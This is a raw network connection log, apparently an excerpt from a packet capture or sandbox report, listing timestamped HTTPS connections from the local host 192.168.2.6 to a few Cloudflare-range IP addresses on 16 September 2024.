Sep 16, 2024 21:22:35.053827047 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:35.053891897 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:39.445425987 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:39.445547104 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:39.445627928 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:39.446044922 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:39.446082115 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:39.925879955 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:39.927722931 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:39.927767038 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084034920 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084161997 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084249020 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084341049 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084346056 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:40.084415913 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084450960 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:40.084522963 CEST	443	49769	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:40.084575891 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:40.085136890 CEST	49769	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:40.120367050 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.120424986 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.120523930 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.120769978 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.120786905 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.583946943 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.585652113 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.585669994 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864080906 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864161968 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864202023 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864290953 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.864329100 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864424944 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.864483118 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864958048 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.864999056 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.865024090 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.865034103 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.865098953 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.865111113 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.865338087 CEST	443	49770	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:40.865495920 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:40.865561008 CEST	49770	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:45.243678093 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:45.243782043 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:45.243896961 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:45.247679949 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:45.247714043 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.139548063 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.141139984 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:46.141202927 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.284976006 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.285018921 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.285039902 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.285056114 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.285074949 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:46.285137892 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.285171986 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:46.291871071 CEST	443	49771	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:46.291941881 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:46.292303085 CEST	49771	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:46.313097000 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:46.313194990 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:46.313275099 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:46.313605070 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:46.313640118 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:46.813147068 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:46.815284967 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:46.815310955 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150382042 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150449038 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150486946 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150521040 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150559902 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:47.150564909 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150597095 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150614023 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:47.150635958 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150743008 CEST	443	49772	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:47.150772095 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:47.154198885 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:47.160062075 CEST	49772	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:51.429567099 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:51.429672003 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:51.429755926 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:51.430079937 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:51.430116892 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.246069908 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.247689009 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:52.247729063 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.577775955 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.577828884 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.577857018 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.577877045 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.577909946 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:52.577935934 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.577970028 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:52.578032970 CEST	443	49773	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:52.578218937 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:52.579663038 CEST	49773	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:52.601422071 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:52.601474047 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:52.601644993 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:52.601902962 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:52.601918936 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.337613106 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.428323030 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.451287031 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.451308012 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.649893045 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.649944067 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.649975061 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650001049 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.650042057 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650084972 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.650091887 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650553942 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650577068 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650623083 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.650629044 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650660038 CEST	443	49775	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:53.650684118 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.650718927 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:53.667402029 CEST	49775	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:57.726628065 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:57.726694107 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:57.726774931 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:57.727020025 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:57.727032900 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.676336050 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.677911997 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:58.677948952 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826111078 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826159954 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826191902 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826219082 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826237917 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:58.826277018 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826291084 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:58.826298952 CEST	443	49776	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:58.826530933 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:58.827256918 CEST	49776	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:59.625279903 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:59.625380039 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:59.625466108 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:59.625725031 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:59.625782013 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.120783091 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.122941971 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:00.122988939 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.377840042 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.377959967 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.378045082 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.378103018 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:00.378115892 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.378149033 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.378196001 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:00.378575087 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.378624916 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:00.378943920 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.379184008 CEST	443	49777	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:00.379247904 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:00.379563093 CEST	49777	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:04.675468922 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:04.675532103 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:04.675590992 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:04.676095009 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:04.676112890 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.141998053 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.145940065 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.145962954 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281236887 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281336069 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281364918 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281380892 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.281395912 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281424046 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281433105 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.281440020 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.281481028 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.281938076 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.282028913 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.282063961 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.282072067 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.286166906 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.286220074 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.286237001 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.369015932 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.369051933 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.369092941 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.369105101 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.369141102 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.369147062 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.369232893 CEST	443	49778	104.21.76.57	192.168.2.6
Sep 16, 2024 21:23:05.369278908 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.370351076 CEST	49778	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:23:05.494322062 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:05.494386911 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:05.494553089 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:05.495014906 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:05.495024920 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:05.958931923 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:05.961080074 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:05.961113930 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.102521896 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.102684975 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.102794886 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.102891922 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:06.102917910 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.103043079 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:06.103048086 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.103099108 CEST	443	49779	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:06.103176117 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:06.103424072 CEST	49779	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:06.199039936 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.199089050 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.199245930 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.199522018 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.199538946 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.658324003 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.660255909 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.660281897 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.914849997 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.914926052 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.914956093 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.914982080 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915003061 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.915009975 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915040016 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.915040970 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915081978 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915106058 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.915118933 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915165901 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.915173054 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915205002 CEST	443	49780	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:06.915245056 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:06.915795088 CEST	49780	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:11.321305037 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.321352005 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.321424007 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.321881056 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.321894884 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.783591032 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.785212040 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.785231113 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928344965 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928395033 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928436995 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928468943 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928499937 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.928518057 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928570032 CEST	443	49781	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:11.928606033 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.928644896 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.928987026 CEST	49781	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:11.975462914 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:11.975517035 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:11.975703001 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:11.976108074 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:11.976120949 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.432326078 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.434170008 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:12.434199095 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689323902 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689377069 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689409971 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689425945 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:12.689441919 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689455032 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689493895 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:12.689512968 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689548016 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689552069 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:12.689560890 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689603090 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:12.689610958 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689645052 CEST	443	49782	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:12.689685106 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:12.690243959 CEST	49782	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:17.085750103 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.085804939 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.085946083 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.086203098 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.086210966 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.600101948 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.602298975 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.602309942 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.754967928 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.755017042 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.755050898 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.755069017 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.755121946 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.755130053 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.755165100 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.764981985 CEST	443	49783	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:17.765150070 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.765471935 CEST	49783	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:17.786565065 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:17.786609888 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:17.786753893 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:17.787720919 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:17.787743092 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.272313118 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.277719021 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:18.277734995 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.516906023 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.516977072 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517008066 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517024994 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:18.517043114 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517071962 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517095089 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:18.517102957 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517138958 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517142057 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:18.517153025 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517189980 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:18.517196894 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517230988 CEST	443	49784	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:18.517271996 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:18.518106937 CEST	49784	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:22.898329020 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:22.898401022 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:22.898478985 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:22.898732901 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:22.898751020 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.363650084 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.365367889 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:23.365400076 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.531101942 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.531162024 CEST	443	49785	104.20.4.235	192.168.2.6
